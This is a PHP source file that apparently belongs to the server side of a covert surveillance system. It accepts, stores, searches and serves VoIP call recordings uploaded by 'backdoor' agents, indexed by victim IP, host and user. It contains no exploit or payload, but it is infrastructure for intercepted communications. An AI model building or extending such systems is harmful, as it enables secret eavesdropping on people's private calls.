<?php

//////////
///
///   log_voip.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['log_voip.add']                 ['function'] = 'log_voip_add';
//   $dm['log_voip.add']                ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                                  $xmlrpcString,     // $backdoor
//                                                                  $xmlrpcString,     // $remoteip
//                                                                  $xmlrpcString,     // $remotehost
//                                                                  $xmlrpcString,     // $remoteuser
//                                                                  $xmlrpcArray));    // $logarray
}

if($al & AL_VIEW) {
   $dm['log_voip.getparam']            ['function'] = 'log_voip_getparam';
//   $dm['log_voip.getparam']           ['signature'] = array(array($xmlrpcStruct,     // return value
//                                                                  $xmlrpcArray,      // $selarray
//                                                                  $xmlrpcArray,      // $backdoorarray
//                                                                  $xmlrpcArray,      // $remoteiparray
//                                                                  $xmlrpcArray,      // $remotehostarray
//                                                                  $xmlrpcArray,      // $remoteuserarray
//                                                                  $xmlrpcArray,      // $tagarray
//                                                                  $xmlrpcArray,      // $acquiredarray
//                                                                  $xmlrpcString));   // $searchstring
}

if($al & AL_VIEW) {
   $dm['log_voip.getgeneral']          ['function'] = 'log_voip_getgeneral';
//   $dm['log_voip.getgeneral']         ['signature'] = array(array($xmlrpcArray,      // return value
//                                                                  $xmlrpcArray,      // $selarray
//                                                                  $xmlrpcArray,      // $backdoorarray
//                                                                  $xmlrpcArray,      // $remoteiparray
//                                                                  $xmlrpcArray,      // $remotehostarray
//                                                                  $xmlrpcArray,      // $remoteuserarray
//                                                                  $xmlrpcArray,      // $tagarray
//                                                                  $xmlrpcArray,      // $acquiredarray
//                                                                  $xmlrpcString,     // $searchstring
//                                                                  $xmlrpcArray));    // $peerarray
}

if($al & AL_VIEW) {
   $dm['log_voip.getdetail']           ['function'] = 'log_voip_getdetail';
//   $dm['log_voip.getdetail']          ['signature'] = array(array($xmlrpcArray,      // return value
//                                                                  $xmlrpcArray,      // $selarray
//                                                                  $xmlrpcArray,      // $backdoorarray
//                                                                  $xmlrpcArray,      // $remoteiparray
//                                                                  $xmlrpcArray,      // $remotehostarray
//                                                                  $xmlrpcArray,      // $remoteuserarray
//                                                                  $xmlrpcArray,      // $tagarray
//                                                                  $xmlrpcArray,      // $acquiredarray
//                                                                  $xmlrpcString,     // $searchstring
//                                                                  $xmlrpcArray,      // $peerarray
//                                                                  $xmlrpcInt));      // $limit
}

if($al & AL_VIEW) {
   $dm['log_voip.getcontent']          ['function'] = 'log_voip_getcontent';
//   $dm['log_voip.getcontent']         ['signature'] = array(array($xmlrpcArray,      // return value
//                                                                  $xmlrpcArray));    // $logarray
}

if($al & AL_VIEW) {
   $dm['log_voip.setgrouppriority']    ['function'] = 'log_voip_setgrouppriority';
//   $dm['log_voip.setgrouppriority']   ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                                  $xmlrpcArray,      // $selarray
//                                                                  $xmlrpcArray,      // $linearray
//                                                                  $xmlrpcInt));      // $priority
}



/***************\
*   FUNCTIONS   *
\***************/

function log_voip_add($backdoor, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= desc
   // varchar2  <= -
   // varchar3  <= -
   // int1      <= [duration(content)]
   // int2      <= [sizeof(content)]
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= content

   foreach($logarray as &$log) {
      if(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']])) {
         clearstatcache();
         $log['_content'] = file_get_contents(sys_get_temp_dir().'/'.$log['contentfile']);
         $log['size'] = filesize(sys_get_temp_dir().'/'.$log['contentfile']);
         unlink(sys_get_temp_dir().'/'.$log['contentfile']);
         unset($_SESSION['upload'][$log['contentfile']]);
         $log['duration'] = strlen($log['_content']) * 8 / 131072;
      } else {
         $log['content'] = $log['content']->scalar;
         $log['size'] = strlen($log['content']);
         $log['duration'] = strlen($log['content']) * 8 / 131072;
      }
   }
   unset($log);

   $ret = db_escape(array(&$backdoor,
                          &$remoteip,
                          &$remotehost,
                          &$remoteuser,
                          &$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }

   $backdoor_id = $ret[0]->backdoor_id;

   foreach($logarray as $log) {
      if(isset($log['_content'])) {
         $ret = db_escape_file($log['_content']);
         if(is_object($ret)) {
            return $ret;
         }
         $log['content'] = &$log['_content'];
      }

      $sql  = "INSERT INTO `log` (`backdoor_id`, ";
      $sql .=                    "`type`, ";
      $sql .=                    "`remoteip`, ";
      $sql .=                    "`remotehost`, ";
      $sql .=                    "`remoteuser`, ";
      $sql .=                    "`received`, ";
      $sql .=                    "`acquired`, ";
      $sql .=                    "`varchar1`, ";
      $sql .=                    "`int1`, ";
      $sql .=                    "`int2`, ";
      $sql .=                    "`longblob1`) ";
      $sql .= "VALUES ('$backdoor_id', ";
      $sql .=         "'VOIP', ";
      $sql .=         "'$remoteip', ";
      $sql .=         "'$remotehost', ";
      $sql .=         "'$remoteuser', ";
      $sql .=         "UTC_TIMESTAMP(), ";
      $sql .=         "'".str_replace(':', '', $log['acquired']->scalar)."', ";
      $sql .=         "'".$log['desc']."', ";
      $sql .=         $log['duration'].", ";
      $sql .=         $log['size'].", ";
      $sql .=         "'";
      $sql .=           $log['content'];
      $sql .=         "')";

      $log = false;

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      }
   }

   return true;
}

function log_voip_getparam($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT DISTINCT `varchar1` AS `peer` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'VOIP')";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? " AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."'))" : '');
   }
   if(count($acquiredarray)) {
      $sql .= " AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ")";
   }
   if($searchstring) {
      $sql .= " AND (0";
      foreach(array('varchar1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ")";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach(array('peer') as $field) {
      $tmp->$field = array();
      foreach($ret as $r) {
         array_push($tmp->$field, $r->$field);
      }
      $tmp->$field = array_unique($tmp->$field);
      sort($tmp->$field);
   }

   $ret = $tmp;

   return $ret;
}

function log_voip_getgeneral($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $peerarray)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$peerarray));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT COUNT(`log_id`) AS `count`, ";
   $sql .=        "DATE_FORMAT(MIN(`acquired`), '%Y%m%dT%T') AS `begin`, ";
   $sql .=        "DATE_FORMAT(MAX(`acquired`), '%Y%m%dT%T') AS `end`, ";
   $sql .=        "LEAST(SUM(`int1`), 1800001) AS `duration`, ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray') as $field) {
      $sql .= (count($$field) ? "`".str_replace('array', '', $field)."`, " : '');
   }
   $sql .= (count($peerarray) ? "`varchar1` AS `peer`, " : '');
   $sql .=        "MAX(`tag`) AS `priority` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'VOIP') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('varchar1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= (count($peerarray) ? "AND (`varchar1` IN ('".implode("', '", $peerarray)."')) " : '');
   $sql .= "GROUP BY `type`";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? ", `".str_replace('array', '', $field)."`" : '');
   }
   $sql .= (count($peerarray) ? ", `varchar1`" : '');

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->count, 'integer');
      xmlrpc_set_type($r->begin, 'datetime');
      xmlrpc_set_type($r->end, 'datetime');
      settype($r->duration, 'integer');
      settype($r->priority, 'integer');
   }
   unset($r);

   return $ret;
}

function log_voip_getdetail($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $peerarray, $limit = -1)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$peerarray,
                          &$limit));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `log_id` AS `log`, ";
   $sql .=        "`backdoor`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "DATE_FORMAT(`acquired`, '%Y%m%dT%T') AS `acquired`, ";
   $sql .=        "DATE_FORMAT(`received`, '%Y%m%dT%T') AS `received`, ";
   $sql .=        "`varchar1` as `peer`, ";
   $sql .=        "LEAST(`int1`, 1800001) AS `duration`, ";
   $sql .=        "`tag` AS `priority`, ";
   $sql .=        "COUNT(`note_id`) AS `notecount` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "LEFT JOIN `note` USING (`log_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'VOIP') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('varchar1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= (count($peerarray) ? "AND (`varchar1` IN ('".implode("', '", $peerarray)."')) " : '');
   $sql .= "GROUP BY `log_id`";
   if($limit >= 0) {
      $sql .= " ORDER BY `log_id` DESC";
      $sql .= " LIMIT $limit";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->log, 'integer');
      xmlrpc_set_type($r->acquired, 'datetime');
      xmlrpc_set_type($r->received, 'datetime');
      settype($r->duration, 'integer');
      settype($r->priority, 'integer');
      settype($r->notecount, 'integer');
   }
   unset($r);

   return $ret;
}

function log_voip_getcontent($logarray)
{
   $ret = db_escape(array(&$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $selarray = array();

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `log_id` AS `log`, ";
   $sql .=        "`longblob1` AS `content` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE (`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`log_id` IN ('".implode("', '", $logarray)."'))";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->log, 'integer');
      xmlrpc_set_type($r->content, 'base64');
   }
   unset($r);

   return $ret;
}

function log_voip_setgrouppriority($selarray, $linearray, $priority)
{
   $ret = db_escape(array(&$selarray,
                          &$linearray,
                          &$priority));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "REPLACE INTO `log` (`log_id`, ";
   $sql .=                     "`tag`, ";
   $sql .=                     "`type`, ";
   $sql .=                     "`backdoor_id`, ";
   $sql .=                     "`remoteip`, ";
   $sql .=                     "`remotehost`, ";
   $sql .=                     "`remoteuser`, ";
   $sql .=                     "`received`, ";
   $sql .=                     "`acquired`, ";
   $sql .=                     "`varchar1`, ";
   $sql .=                     "`varchar2`, ";
   $sql .=                     "`varchar3`, ";
   $sql .=                     "`int1`, ";
   $sql .=                     "`int2`, ";
   $sql .=                     "`int3`, ";
   $sql .=                     "`longtext1`, ";
   $sql .=                     "`longblob1`) ";
   $sql .= "SELECT `log_id`, ";
   $sql .=        "$priority, ";
   $sql .=        "`type`, ";
   $sql .=        "`backdoor_id`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`received`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`int1`, ";
   $sql .=        "`int2`, ";
   $sql .=        "`int3`, ";
   $sql .=        "`longtext1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`type` = 'VOIP') AND ";
   if(count($linearray)) {
      $sql .= "(0";
      foreach($linearray as $line) {
         $sql .= " OR (1";
         foreach(array('backdoor', 'remoteip', 'remotehost', 'remoteuser') as $field) {
            $sql .= (isset($line[$field]) ? " AND (`$field` = '".$line[$field]."')" : '');
         }
         $sql .= (isset($line['priority']) ? " AND (`tag` = '".$line['priority']."')" : '');
         if(isset($line['search']) && $line['search']) {
            $sql .= " AND (0";
            foreach(array('varchar1') as $field) {
               $sql .= " OR (`$field` REGEXP '".$line['search']."')";
            }
            $sql .= ")";
         }
         if(isset($line['begin']) && isset($line['end'])) {
            $sql .= " AND (`acquired` BETWEEN '".str_replace(':', '', $line['begin']->scalar)."' AND '".str_replace(':', '', $line['end']->scalar)."')";
         }
         $sql .= (isset($line['peer']) ? " AND (`varchar1` = '".$line['peer']."')" : '');
         $sql .= ")";
      }
      $sql .= ") AND ";
   }
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."')";

   $ret = db_query($sql);

   return $ret;
}

?>
